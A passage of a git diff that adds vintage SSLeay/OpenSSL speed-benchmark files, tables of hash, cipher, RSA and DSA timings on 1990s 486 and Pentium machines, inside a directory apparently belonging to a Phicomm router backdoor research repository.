+mdc2              245.80k      259.02k      259.34k      259.16k      260.14k
+md5              1103.42k     6017.65k    12210.49k    16552.11k    18291.77k
+hmac(md5)         520.15k     3394.00k     8761.86k    14593.96k    17742.40k
+sha1              538.06k     2726.76k     5242.22k     6821.12k     7426.18k
+rc4              8283.90k    10513.09k    10886.38k    10929.50k    10816.75k
+des cbc          2073.10k     2232.91k     2251.61k     2256.46k     2232.44k
+des ede3          758.85k      782.46k      786.14k      786.08k      781.24k
+idea cbc          831.02k      892.63k      901.07k      903.48k      901.85k
+rc2 cbc           799.89k      866.09k      873.96k      876.22k      874.03k
+blowfish cbc     3835.32k     4418.78k     4511.94k     4494.54k     4416.92k
+cast cbc         2974.68k     3272.71k     3313.04k     3335.17k     3261.51k
+                  sign    verify
+rsa  512 bits   0.0202s   0.0019s
+rsa 1024 bits   0.1029s   0.0062s
+rsa 2048 bits   0.6770s   0.0220s
+rsa 4096 bits   4.8770s   0.0838s
+                  sign    verify
+dsa  512 bits   0.0191s   0.0364s
+dsa 1024 bits   0.0590s   0.1141s
+dsa 2048 bits   0.2088s   0.4171s
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/200.lnx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/200.lnx
new file mode 100644
index 0000000..95095e1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/200.lnx
@@ -0,0 +1,30 @@
+This machine was slightly loaded :-(
+
+SSLeay 0.8.4c 03-Aug-1999
+built on Tue Nov  4 02:52:29 EST 1997
+options:bn(64,32) md2(int) rc4(ptr,int) des(ptr,risc1,16,long) idea(int) blowfish(ptr2) 
+C flags:gcc -DL_ENDIAN -DTERMIOS -DBN_ASM -O3 -fomit-frame-pointer -m486 -Wall -Wuninitialized -DMD5_ASM -DSHA1_ASM
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2               130.86k      365.31k      499.60k      547.75k      561.41k
+mdc2              526.03k      581.38k      587.12k      586.31k      589.60k
+md5              1919.49k    11173.23k    22387.60k    29553.47k    32587.21k
+hmac(md5)         747.09k     5248.35k    14275.44k    24713.26k    31737.13k
+sha1             1336.63k     6400.50k    11668.67k    14648.83k    15700.85k
+rc4             15002.32k    21327.21k    22301.63k    22503.78k    22549.26k
+des cbc          4115.16k     4521.08k     4632.37k     4607.28k     4570.57k
+des ede3         1540.29k     1609.76k     1623.64k     1620.76k     1624.18k
+idea cbc         2405.08k     2664.78k     2704.22k     2713.95k     2716.29k
+rc2 cbc          1634.07k     1764.30k     1780.23k     1790.27k     1788.12k
+blowfish cbc     5993.98k     6927.27k     7083.61k     7088.40k     7123.72k
+cast cbc         5981.52k     6900.44k     7079.70k     7110.40k     7057.72k
+                  sign    verify
+rsa  512 bits   0.0085s   0.0007s
+rsa 1024 bits   0.0377s   0.0020s
+rsa 2048 bits   0.2176s   0.0067s
+rsa 4096 bits   1.4800s   0.0242s
+sign    verify
+dsa  512 bits   0.0071s   0.0132s
+dsa 1024 bits   0.0192s   0.0376s
+dsa 2048 bits   0.0638s   0.1280s
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/486-66.dos b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/486-66.dos
new file mode 100644
index 0000000..1644bf8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/486-66.dos
@@ -0,0 +1,22 @@
+MS-dos static libs, 16bit C build, 16bit assember
+
+SSLeay 0.6.1
+options:bn(32,16) md2(char) rc4(idx,int) des(ptr,long) idea(short)
+C flags:cl /ALw /Gx- /Gf /f- /Ocgnotb2 /G2 /W3 /WX -DL_ENDIAN /nologo -DMSDOS -D
+NO_SOCK
+The 'numbers' are in 1000s of bytes per second processed.
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2             18.62k       55.54k       76.88k       85.39k       86.52k
+md5             94.03k      442.06k      794.38k      974.51k     1061.31k
+sha             38.37k      166.23k      272.78k      331.41k      353.77k
+sha1            34.38k      147.77k      244.77k      292.57k      312.08k
+rc4            641.25k      795.34k      817.16k      829.57k      817.16k
+des cfb        111.46k      118.08k      120.69k      119.16k      119.37k
+des cbc        122.96k      135.69k      137.10k      135.69k      135.40k
+des ede3        48.01k       50.92k       50.32k       50.96k       50.96k
+idea cfb        97.09k      100.21k      100.36k      101.14k      100.98k
+idea cbc       102.08k      109.41k      111.46k      111.65k      110.52k
+rc2 cfb        120.47k      125.55k      125.79k      125.55k      125.55k
+rc2 cbc        129.77k      140.33k      143.72k      142.16k      141.85k
+rsa  512 bits   0.264s
+rsa 1024 bits   1.494s
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/486-66.nt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/486-66.nt
new file mode 100644
index 0000000..b26a900
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/486-66.nt
@@ -0,0 +1,22 @@
+SSLeay 0.6.1 02-Jul-1996
+built on Fri Jul 10 09:53:15 EST 1996
+options:bn(64,32) md2(int) rc4(idx,int) des(idx,long) idea(int)
+C flags:cl /W3 /WX /G5 /Ox /O2 /Ob2 /Gs0 /nologo -DWIN32 -DL_ENDIAN /MD
+The 'numbers' are in 1000s of bytes per second processed.
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2             38.27k      107.28k      145.43k      159.60k      164.15k
+md5            399.00k     1946.13k     3610.80k     4511.94k     4477.27k
+sha            182.04k      851.26k     1470.65k     1799.20k     1876.48k
+sha1           151.83k      756.55k     1289.76k     1567.38k     1625.70k
+rc4           1853.92k     2196.25k     2232.91k     2241.31k     2152.96k
+des cfb        360.58k      382.69k      384.94k      386.07k      377.19k
+des cbc        376.10k      431.87k      436.32k      437.78k      430.45k
+des ede3       152.55k      160.38k      161.51k      161.33k      159.98k
+idea cfb       245.59k      255.60k      256.65k      257.16k      254.61k
+idea cbc       257.16k      276.12k      279.05k      279.11k      276.70k
+rc2 cfb        280.25k      293.49k      294.74k      294.15k      291.47k
+rc2 cbc        295.47k      321.57k      324.76k      324.76k      320.00k
+rsa  512 bits   0.084s
+rsa 1024 bits   0.495s
+rsa 2048 bits   3.435s
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/486-66.w31 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/486-66.w31
new file mode 100644
index 0000000..381f149
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/486-66.w31
@@ -0,0 +1,23 @@
+Windows 3.1 DLL's, 16 bit C with 32bit assember
+
+SSLeay 0.6.1 02-Jul-1996
+built on Wed Jul 10 09:53:15 EST 1996
+options:bn(32,32) md2(char) rc4(idx,int) des(ptr,long) idea(short)
+C flags:cl /ALw /Gx- /Gf /G2 /f- /Ocgnotb2 /W3 /WX -DL_ENDIAN /nologo -DWIN16
+The 'numbers' are in 1000s of bytes per second processed.
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2             18.94k       54.27k       73.43k       80.91k       83.75k
+md5             78.96k      391.26k      734.30k      919.80k      992.97k
+sha             39.01k      168.04k      280.67k      336.08k      359.10k
+sha1            35.20k      150.14k      247.31k      294.54k      313.94k
+rc4            509.61k      655.36k      678.43k      677.02k      670.10k
+des cfb         97.09k      104.69k      106.56k      105.70k      106.56k
+des cbc        116.82k      129.77k      131.07k      131.07k      131.07k
+des ede3        44.22k       47.90k       48.53k       48.47k       47.86k
+idea cfb        83.49k       87.03k       87.03k       87.15k       87.73k
+idea cbc        89.04k       96.23k       96.95k       97.81k       97.09k
+rc2 cfb        108.32k      113.58k      113.78k      114.57k      114.77k
+rc2 cbc        118.08k      131.07k      134.02k      134.02k      132.66k
+rsa  512 bits   0.181s
+rsa 1024 bits   0.846s
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/5.lnx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/5.lnx
new file mode 100644
index 0000000..ef286b8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/5.lnx
@@ -0,0 +1,29 @@
+SSLeay 0.8.5g 24-Jan-1998
+built on Tue Jan 27 08:11:42 EST 1998
+options:bn(64,32) md2(int) rc4(idx,int) des(ptr,risc1,16,long) idea(int) blowfish(ptr2) 
+C flags:gcc -DL_ENDIAN -DTERMIOS -DBN_ASM -O3 -fomit-frame-pointer -m486 -Wall -Wuninitialized -DSHA1_ASM -DMD5_ASM -DRMD160_ASM
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                 56.55k      156.69k      211.63k      231.77k      238.71k
+mdc2               192.26k      208.09k      210.09k      209.58k      210.26k
+md5                991.04k     5745.51k    11932.67k    16465.24k    18306.39k
+hmac(md5)          333.99k     2383.89k     6890.67k    13133.82k    17397.08k
+sha1               571.68k     2883.88k     5379.07k     6880.26k     7443.80k
+rmd160             409.41k     2212.91k     4225.45k     5456.55k     5928.28k
+rc4               6847.57k     8596.22k     8901.80k     8912.90k     8850.09k
+des cbc           2046.29k     2229.78k     2254.76k     2259.97k     2233.69k
+des ede3           751.11k      779.95k      783.96k      784.38k      780.97k
+idea cbc           653.40k      708.29k      718.42k      720.21k      720.90k
+rc2 cbc            647.19k      702.46k      709.21k      710.66k      709.97k
+rc5-32/12 cbc     3498.18k     4054.12k     4133.46k     4151.64k     4139.69k
+blowfish cbc      3763.95k     4437.74k     4532.74k     4515.50k     4448.26k
+cast cbc          2754.22k     3020.67k     3079.08k     3069.95k     3036.50k
+                  sign    verify    sign/s verify/s
+rsa  512 bits   0.0207s   0.0020s     48.3    511.3
+rsa 1024 bits   0.1018s   0.0059s      9.8    169.6
+rsa 2048 bits   0.6438s   0.0208s      1.6     48.0
+rsa 4096 bits   4.6033s   0.0793s      0.2     12.6
+                  sign    verify    sign/s verify/s
+dsa  512 bits   0.0190s   0.0359s     52.6     27.8
+dsa 1024 bits   0.0566s   0.1109s     17.7      9.0
+dsa 2048 bits   0.1988s   0.3915s      5.0      2.6
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-085i.nt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-085i.nt
new file mode 100644
index 0000000..8a57975
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-085i.nt
@@ -0,0 +1,29 @@
+SSLeay 0.8.5i 28-Jan-1998
+built on Wed Jan 28 18:00:07 EST 1998
+options:bn(64,32) md2(int) rc4(idx,int) des(idx,cisc,4,long) idea(int) blowfish(ptr2)
+C flags:cl /MT /W3 /WX /G5 /Ox /O2 /Ob2 /Gs0 /GF /Gy /nologo -DWIN32 -DL_ENDIAN -DBN_ASM -DMD5_ASM -DSHA1_ASM -DRMD160_ASM
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                 92.74k      257.59k      348.16k      381.79k      392.14k
+mdc2               227.65k      247.82k      249.90k      250.65k      250.20k
+md5               1089.54k     5966.29k    12104.77k    16493.53k    18204.44k
+hmac(md5)          513.53k     3361.36k     8725.41k    14543.36k    17593.56k
+sha1               580.74k     2880.51k     5376.62k     6865.78k     7413.05k
+rmd160             508.06k     2427.96k     4385.51k     5510.84k     5915.80k
+rc4               8004.40k    10408.74k    10794.48k    10884.12k    10728.22k
+des cbc           2057.24k     2222.97k     2246.79k     2209.39k     2223.44k
+des ede3           739.42k      761.99k      765.48k      760.26k      760.97k
+idea cbc           827.08k      889.60k      898.83k      901.15k      897.98k
+rc2 cbc            795.64k      861.04k      871.13k      872.58k      871.13k
+rc5-32/12 cbc     3597.17k     4139.66k     4204.39k     4223.02k     4204.39k
+blowfish cbc      3807.47k     3996.10k     4156.07k     4204.39k     4105.62k
+cast cbc          2777.68k     2814.21k     2892.62k     2916.76k     2868.88k
+                  sign    verify    sign/s verify/s
+rsa  512 bits   0.0178s   0.0018s     56.3    541.6
+rsa 1024 bits   0.0945s   0.0059s     10.6    168.3
+rsa 2048 bits   0.6269s   0.0208s      1.6     48.0
+rsa 4096 bits   4.5560s   0.0784s      0.2     12.8
+                  sign    verify    sign/s verify/s
+dsa  512 bits   0.0178s   0.0340s     56.2     29.4
+dsa 1024 bits   0.0552s   0.1077s     18.1      9.3
+dsa 2048 bits   0.1963s   0.3811s      5.1      2.6
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.LN3 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.LN3
new file mode 100644
index 0000000..a902d36
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.LN3
@@ -0,0 +1,26 @@
+SSLeay 0.8.3v 15-Oct-1997
+built on Wed Oct 15 10:05:00 EST 1997
+options:bn(64,32) md2(int) rc4(idx,int) des(ptr,risc1,16,long) idea(int) blowfish(ptr2) 
+C flags:gcc -DL_ENDIAN -DTERMIOS -DX86_ASM -O3 -fomit-frame-pointer -m486 -Wall -Wuninitialized
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                56.27k      156.76k      211.46k      231.77k      238.71k
+mdc2              188.74k      206.12k      207.70k      207.87k      208.18k
+md5               991.56k     5718.31k    11748.61k    16090.79k    17850.37k
+hmac(md5)         387.56k     2636.01k     7327.83k    13340.33k    17091.24k
+sha1              463.55k     2274.18k     4071.17k     5072.90k     5447.68k
+rc4              3673.94k     4314.52k     4402.26k     4427.09k     4407.30k
+des cbc          2023.79k     2209.77k     2233.34k     2220.71k     2222.76k
+des ede3          747.17k      778.54k      781.57k      778.24k      778.24k
+idea cbc          614.64k      678.04k      683.52k      685.06k      685.40k
+rc2 cbc           536.83k      574.10k      578.05k      579.24k      578.90k
+blowfish cbc     3673.39k     4354.58k     4450.22k     4429.48k     4377.26k
+                  sign    verify
+rsa  512 bits   0.0217s   0.0021s
+rsa 1024 bits   0.1083s   0.0064s
+rsa 2048 bits   0.6867s   0.0223s
+rsa 4096 bits   4.9400s   0.0846s
+                  sign    verify
+dsa  512 bits   0.0203s   0.0387s
+dsa 1024 bits   0.0599s   0.1170s
+dsa 2048 bits   0.2115s   0.4242s
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.NT2 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.NT2
new file mode 100644
index 0000000..7f8c167
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.NT2
@@ -0,0 +1,26 @@
+SSLeay 0.8.3e 30-Sep-1997
+built on Tue Sep 30 14:52:58 EST 1997
+options:bn(64,32) md2(int) rc4(idx,int) des(idx,cisc,4,long) idea(int) blowfish(ptr2)
+C flags:cl /W3 /WX /G5 /Ox /O2 /Ob2 /Gs0 /GF /Gy /nologo -DWIN32 -DL_ENDIAN -DX86_ASM
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                92.99k      257.59k      348.16k      381.47k      392.14k
+mdc2              223.77k      235.30k      237.15k      236.77k      237.29k
+md5               862.53k     4222.17k     7842.75k     9925.00k    10392.23k
+sha               491.34k     2338.61k     4062.28k     4986.10k     5307.90k
+sha1              494.38k     2234.94k     3838.83k     4679.58k     4980.18k
+rc4              6338.10k     7489.83k     7676.25k     7698.80k     7631.56k
+des cbc          1654.17k     1917.66k     1961.05k     1968.05k     1960.69k
+des ede3          691.17k      739.42k      744.13k      745.82k      741.40k
+idea cbc          788.46k      870.33k      879.16k      881.38k      879.90k
+rc2 cbc           794.44k      859.63k      868.24k      869.68k      867.45k
+blowfish cbc     2379.88k     3017.48k     3116.12k     3134.76k     3070.50k
+                  sign    verify
+rsa  512 bits   0.0204s   0.0027s
+rsa 1024 bits   0.1074s   0.0032s
+rsa 2048 bits   0.6890s   0.0246s
+rsa 4096 bits   5.0180s   0.0911s
+                  sign    verify
+dsa  512 bits   0.0201s   0.0376s
+dsa 1024 bits   0.0608s   0.1193s
+dsa 2048 bits   0.2133s   0.4294s
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.dos b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.dos
new file mode 100644
index 0000000..3085c25
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.dos
@@ -0,0 +1,24 @@
+ms-dos static libs, 16 bit C and 16 bit assmber 
+
+SSLeay 0.6.1 02-Jul-1996
+built on Tue Jul  9 22:52:54 EST 1996
+options:bn(32,16) md2(char) rc4(idx,int) des(ptr,long) idea(short)
+C flags:cl /ALw /Gx- /Gf /G2 /f- /Ocgnotb2 /W3 /WX -DL_ENDIAN /nologo -DMSDOS -DNO_SOCK
+The 'numbers' are in 1000s of bytes per second processed.
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2             45.99k      130.75k      176.53k      199.35k      203.21k
+md5            236.17k     1072.16k     1839.61k     2221.56k     2383.13k
+sha            107.97k      459.10k      757.64k      908.64k      954.99k
+sha1            96.95k      409.92k      672.16k      788.40k      844.26k
+rc4           1659.14k     1956.30k     2022.72k     2022.72k     2022.72k
+des cfb        313.57k      326.86k      326.86k      331.83k      326.86k
+des cbc        345.84k      378.82k      378.82k      384.38k      378.82k
+des ede3       139.59k      144.66k      144.61k      144.45k      143.29k
+idea cfb       262.67k      274.21k      274.21k      274.21k      274.21k
+idea cbc       284.32k      318.14k      318.14k      318.14k      318.14k
+rc2 cfb        265.33k      274.21k      277.69k      277.11k      277.69k
+rc2 cbc        283.71k      310.60k      309.86k      313.57k      314.32k
+rsa  512 bits   0.104s
+rsa 1024 bits   0.566s
+rsa 2048 bits   3.680s
+rsa 4096 bits  26.740s
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.ln4 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.ln4
new file mode 100644
index 0000000..e90ee71
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.ln4
@@ -0,0 +1,26 @@
+SSLeay 0.8.3aa 24-Oct-1997
+built on Mon Oct 27 10:16:25 EST 1997
+options:bn(64,32) md2(int) rc4(idx,int) des(ptr,risc1,16,long) idea(int) blowfish(ptr2) 
+C flags:gcc -DL_ENDIAN -DTERMIOS -DBN_ASM -O3 -fomit-frame-pointer -m486 -Wall -Wuninitialized -DMD5_ASM -DSHA1_ASM
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                56.78k      156.71k      211.46k      231.77k      238.71k
+mdc2              187.45k      200.49k      201.64k      202.75k      202.77k
+md5              1002.51k     5798.66k    11967.15k    16449.19k    18251.78k
+hmac(md5)         468.71k     3173.46k     8386.99k    14305.56k    17607.34k
+sha1              586.98k     2934.87k     5393.58k     6863.19k     7408.30k
+rc4              3675.10k     4314.15k     4402.77k     4427.78k     4404.57k
+des cbc          1902.96k     2202.01k     2242.30k     2252.46k     2236.42k
+des ede3          700.15k      774.23k      783.70k      781.62k      783.70k
+idea cbc          618.46k      677.93k      683.61k      685.40k      685.40k
+rc2 cbc           536.97k      573.87k      577.96k      579.24k      578.90k
+blowfish cbc     3672.66k     4271.89k     4428.80k     4469.76k     4374.53k
+                  sign    verify
+rsa  512 bits   0.0213s   0.0021s
+rsa 1024 bits   0.1075s   0.0063s
+rsa 2048 bits   0.6853s   0.0224s
+rsa 4096 bits   4.9400s   0.0845s
+                  sign    verify
+dsa  512 bits   0.0203s   0.0380s
+dsa 1024 bits   0.0600s   0.1189s
+dsa 2048 bits   0.2110s   0.4250s
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.lnx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.lnx
new file mode 100644
index 0000000..0e236db
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.lnx
@@ -0,0 +1,23 @@
+SSLeay 0.7.3 30-Apr-1997
+built on Mon May 12 04:13:55 EST 1997
+options:bn(64,32) md2(char) rc4(idx,int) des(ptr,risc1,16,long) idea(int) blowfish(ptr2)
+C flags:gcc -DL_ENDIAN -DTERMIOS -O3 -fomit-frame-pointer -m486 -Wall -Wuninitialized
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                72.95k      202.77k      274.01k      300.37k      309.23k
+md5               770.57k     4094.02k     7409.41k     9302.36k     9986.05k
+sha               363.05k     1571.07k     2613.85k     3134.81k     3320.49k
+sha1              340.94k     1462.85k     2419.20k     2892.12k     3042.35k
+rc4              3676.91k     4314.94k     4407.47k     4430.51k     4412.76k
+des cbc          1489.95k     1799.08k     1841.66k     1851.73k     1848.66k
+des ede3          621.93k      711.19k      726.10k      729.77k      729.09k
+idea cbc          618.16k      676.99k      683.09k      684.37k      683.59k
+rc2 cbc           537.59k      573.93k      578.56k      579.58k      579.70k
+blowfish cbc     2077.57k     2682.20k     2827.18k     2840.92k     2842.62k
+rsa  512 bits   0.024s   0.003
+rsa 1024 bits   0.120s   0.003
+rsa 2048 bits   0.751s   0.026
+rsa 4096 bits   5.320s   0.096
+dsa  512 bits   0.022s   0.042
+dsa 1024 bits   0.065s   0.126
+dsa 2048 bits   0.227s   0.449
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.nt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.nt
new file mode 100644
index 0000000..9adcac3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.nt
@@ -0,0 +1,23 @@
+SSLeay 0.7.3 30-Apr-1997
+built on Mon May 19 10:47:38 EST 1997
+options:bn(64,32) md2(char) rc4(idx,int) des(idx,cisc,4,long) idea(int) blowfish(ptr2)
+C flags not available
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                89.57k      245.94k      331.59k      362.95k      373.29k
+md5               858.93k     4175.51k     7700.21k     9715.78k    10369.11k
+sha               466.18k     2103.67k     3607.69k     4399.31k     4669.16k
+sha1              449.59k     2041.02k     3496.13k     4256.45k     4512.92k
+rc4              5862.55k     7447.27k     7698.80k     7768.38k     7653.84k
+des cbc          1562.71k     1879.84k     1928.24k     1938.93k     1911.02k
+des ede3          680.27k      707.97k      728.62k      733.15k      725.98k
+idea cbc          797.46k      885.85k      895.68k      898.06k      896.45k
+rc2 cbc           609.46k      648.75k      654.01k      654.42k      653.60k
+blowfish cbc     2357.94k     3000.22k     3106.89k     3134.76k     3080.42k
+rsa  512 bits   0.022s   0.003
+rsa 1024 bits   0.112s   0.003
+rsa 2048 bits   0.726s   0.026
+rsa 4096 bits   5.268s   0.095
+dsa  512 bits   0.021s   0.039
+dsa 1024 bits   0.063s   0.127
+dsa 2048 bits   0.224s   0.451
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.ntx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.ntx
new file mode 100644
index 0000000..35166a5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.ntx
@@ -0,0 +1,30 @@
+SSLeay 0.8.5f 22-Jan-1998
+built on Wed Jan 21 17:11:53 EST 1998
+options:bn(64,32) md2(int) rc4(idx,int) des(idx,cisc,4,long) idea(int) blowfish(
+ptr2)
+C flags:cl /MT /W3 /WX /G5 /Ox /O2 /Ob2 /Gs0 /GF /Gy /nologo -DWIN32 -DL_ENDIAN
+-DBN_ASM -DMD5_ASM -DSHA1_ASM -DRMD160_ASM
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                92.99k      257.43k      347.84k      381.82k      392.14k
+mdc2              232.19k      253.68k      257.57k      258.70k      258.70k
+md5              1094.09k     5974.79k    12139.81k    16487.04k    18291.77k
+hmac(md5)         375.70k     2590.04k     7309.70k    13469.18k    17447.19k
+sha1              613.78k     2982.93k     5446.44k     6889.46k     7424.86k
+rmd160            501.23k     2405.68k     4367.25k     5503.61k     5915.80k
+rc4              8167.75k    10429.44k    10839.12k    10929.50k    10772.30k
+des cbc          2057.24k     2218.27k     2237.20k     2227.69k     2213.59k
+des ede3          719.63k      727.11k      728.77k      719.56k      722.97k
+idea cbc          827.67k      888.85k      898.06k      900.30k      898.75k
+rc2 cbc           797.46k      862.53k      870.33k      872.58k      870.40k
+blowfish cbc     3835.32k     4435.60k     4513.89k     4513.89k     4416.92k
+cast cbc         2785.06k     3052.62k     3088.59k     3034.95k     3034.95k
+                  sign    verify    sign/s verify/s
+rsa  512 bits   0.0202s   0.0020s     49.4    500.2
+rsa 1024 bits   0.1030s   0.0063s      9.7    159.4
+rsa 2048 bits   0.6740s   0.0223s      1.5     44.9
+rsa 4096 bits   4.8970s   0.0844s      0.2     11.8
+                  sign    verify    sign/s verify/s
+dsa  512 bits   0.0191s   0.0361s     52.4     27.7
+dsa 1024 bits   0.0587s   0.1167s     17.0      8.6
+dsa 2048 bits   0.2091s   0.4123s      4.8      2.4
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.w31 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.w31
new file mode 100644
index 0000000..d5b1c10
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-100.w31
@@ -0,0 +1,27 @@
+Pentium 100, Windows 3.1 DLL's, 16 bit C, 32bit assember.
+
+Running under Windows NT 4.0 Beta 2
+
+SSLeay 0.6.4 20-Aug-1996
+built on Thu Aug 22 08:44:21 EST 1996
+options:bn(32,32) md2(char) rc4(idx,int) des(ptr,long) idea(short)
+C flags:cl /ALw /Gx- /Gf /G2 /f- /Ocgnotb2 /W3 /WX -DL_ENDIAN /nologo -DWIN16
+The 'numbers' are in 1000s of bytes per second processed.
+type           8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2             45.83k      128.82k      180.17k      194.90k      198.59k
+md5            224.82k     1038.19k     1801.68k     2175.47k     2330.17k
+sha            105.11k      448.11k      739.48k      884.13k      944.66k
+sha1            94.71k      402.99k      667.88k      795.58k      844.26k
+rc4           1614.19k     1956.30k     2022.72k     2022.72k     2022.72k
+des cfb        291.27k      318.14k      318.14k      318.14k      322.84k
+des cbc        326.86k      356.17k      362.08k      362.08k      367.15k
+des ede3       132.40k      139.57k      139.53k      139.37k      140.97k
+idea cfb       265.33k      280.67k      280.67k      277.69k      281.27k
+idea cbc       274.21k      302.01k      306.24k      306.24k      305.53k
+rc2 cfb        264.79k      274.21k      274.78k      274.21k      274.21k
+rc2 cbc        281.27k      306.24k      309.86k      305.53k      309.86k
+rsa  512 bits   0.058s
+rsa 1024 bits   0.280s
+rsa 2048 bits   1.430s
+rsa 4096 bits  10.600s
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-1002.lnx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-1002.lnx
new file mode 100644
index 0000000..da75ad2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/times/586-1002.lnx
@@ -0,0 +1,26 @@
+SSLeay 0.8.3e 30-Sep-1997
+built on Wed Oct  1 03:01:44 EST 1997
+options:bn(64,32) md2(int) rc4(idx,int) des(ptr,risc1,16,long) idea(int) blowfish(ptr2) 
+C flags:gcc -DL_ENDIAN -DTERMIOS -DX86_ASM -O3 -fomit-frame-pointer -m486 -Wall -Wuninitialized
+The 'numbers' are in 1000s of bytes per second processed.
+type              8 bytes     64 bytes    256 bytes   1024 bytes   8192 bytes
+md2                56.21k      156.57k      211.29k      231.77k      237.92k
+mdc2              170.99k      191.70k      193.90k      195.58k      195.95k
+md5               770.50k     3961.96k     7291.22k     9250.82k     9942.36k
+sha               344.93k     1520.77k     2569.81k     3108.52k     3295.91k
+sha1              326.20k     1423.74k     2385.15k     2870.95k     3041.96k
+rc4              3672.88k     4309.65k     4374.41k     4408.66k     4355.41k
+des cbc          1349.73k     1689.05k     1735.34k     1748.99k     1739.43k
+des ede3          638.70k      704.00k      711.85k      714.41k      712.70k
+idea cbc          619.55k      677.33k      683.26k      685.06k      685.40k
+rc2 cbc           521.18k      571.20k      573.46k      578.90k      578.90k
+blowfish cbc     2079.67k     2592.49k     2702.34k     2730.33k     2695.17k
+                  sign    verify
+rsa  512 bits   0.0213s   0.0026s
+rsa 1024 bits   0.1099s   0.0031s
+rsa 2048 bits   0.7007s   0.0248s
+rsa 4096 bits   5.0500s   0.0921s
+                  sign    verify
+dsa  512 bits   0.0203s   0.0389s
+dsa 1024 bits   0.0614s   0.1222s
+dsa 2048 bits   0.2149s   0.4283s
